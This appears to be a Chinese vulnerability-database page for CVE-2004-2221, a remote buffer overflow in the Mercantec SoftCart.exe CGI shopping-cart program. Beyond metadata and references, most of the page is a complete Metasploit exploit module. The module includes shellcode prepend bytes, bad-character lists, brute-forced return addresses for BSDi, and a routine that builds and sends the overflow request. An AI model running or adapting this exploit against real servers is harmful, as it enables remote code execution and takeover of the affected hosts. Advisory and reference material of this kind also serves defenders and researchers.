SoftCart SoftCart.exe CGI远程缓冲区溢出漏洞

SoftCart SoftCart.exe CGI远程缓冲区溢出漏洞

漏洞ID 1108125 漏洞类型 边界条件错误
发布时间 2004-08-19 更新时间 2005-10-20
图片[1]-SoftCart SoftCart.exe CGI远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-2221
图片[2]-SoftCart SoftCart.exe CGI远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-845
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/10037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-845
|漏洞详情
SoftCart是一款Mercantec公司出品的电子商务软件包。SoftCart在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。SoftCart.exe在处理请求中带的超长参数时存在缓冲区溢出,攻击者可能通过溢出攻击获取服务器的控制。
|漏洞EXP
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mercantec SoftCart CGI Overflow',
			'Description'    => %q{
				This is an exploit for an undisclosed buffer overflow
				in the SoftCart.exe CGI as shipped with Mercantec's shopping
				cart software.  It is possible to execute arbitrary code
				by passing a malformed CGI parameter in an HTTP GET
				request.  This issue is known to affect SoftCart version
				4.00b.
			},
			'Author'         => [ 'skape', 'trew' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
				    	[ 'CVE', '2004-2221'],
					[ 'OSVDB', '9011'],
					[ 'BID', '10926'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "x09x0ax0bx0cx0dx20x27x5cx3cx3ex3bx22x60x7ex24x5ex2ax26x7cx7bx7dx28x29x3fx5dx5bx00",
					'MinNops'  => 16,
					'Prepend'  => "x6ax02x58x50x9ax00x00x00x00x07x00x85xd2x75x0ax31xc0x40x9ax00x00x00x00x07x00",
					'PrependEncoder' => "x83xecx7f",
				},
			'Platform'       => 'bsdi',
			'Targets'        => 
				[
					[ 
						'BSDi/4.3 Bruteforce',
						{
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xefbf3000 },
									'Stop'  => { 'Ret' => 0xefbffffc },
									'Step'  => 0
								}
						},
					],
				],
			'DisclosureDate' => 'Aug 19 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [ false, "The target CGI URI", '/cgi-bin/SoftCart.exe' ])
			], self.class)
	end

	def brute_exploit(address)
		
		buffer =
			"MAA+scstoreB" +
			rand_text_alphanumeric(512) +
			[address['Ret']].pack('V') +
			"MSF!" +
			[address['Ret'] + payload.encoded.length].pack('V') +
			payload.encoded

		print_status("Trying #{"%.8x" % address['Ret']}...")
		res = send_request_raw({
			'uri'   => datastore['URI'],
			'query' => buffer
		}, 5)

		handler
	end

end
|参考资料

来源:BID
名称:10926
链接:http://www.securityfocus.com/bid/10926
来源:XF
名称:softcart-softcartexecgi-bo(17008)
链接:http://xforce.iss.net/xforce/xfdb/17008
来源:OSVDB
名称:9011
链接:http://www.osvdb.org/9011
来源:metasploit.com
链接:http://metasploit.com/projects/Framework/modules/exploits/mercantec_softcart.pm
来源:NSFOCUS
名称:8976
链接:http://www.nsfocus.net/vulndb/8976

相关推荐: Directory traversal vulnerability in Computalynx CProxy 目录遍历漏洞

Directory traversal vulnerability in Computalynx CProxy 目录遍历漏洞 漏洞ID 1199364 漏洞类型 路径遍历 发布时间 2005-05-02 更新时间 2005-05-02 CVE编号 CVE-20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享